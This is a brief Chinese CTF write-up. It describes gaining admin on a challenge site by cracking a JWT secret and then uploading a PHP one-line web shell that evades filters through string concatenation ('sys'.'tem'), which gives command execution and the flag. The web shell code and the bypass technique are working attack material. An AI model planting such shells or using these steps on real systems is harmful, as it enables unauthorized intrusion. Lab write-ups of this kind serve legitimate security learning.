image-20260329211028133

在源码找到一个账号密码

image-20260329211004132

登录上去是一个文件上传点,显示身份user,功能不可用,判断是要提权admin

image-20260329211122023

先退出,再登录一次抓包

image-20260329211553732

先放行一次,会又抓到一个请求包,里面有一个token

image-20260329211641142

直接用jwt-cracker,爆破出密钥,为“cdef”

image-20260329211742091

先上传一个png文件

image-20260329212037635

抓包后把后缀改成.php,内容为一句话木马,用字符串拼接绕过

1
2
3
4
<?=
$s='sys'.'tem';
$s($_GET[1]);
?>

image-20260329212214280

image-20260329212451809

得到木马路径,直接访问

最后在根目录获得flag,only_real也是这个解法

image-20260329210853798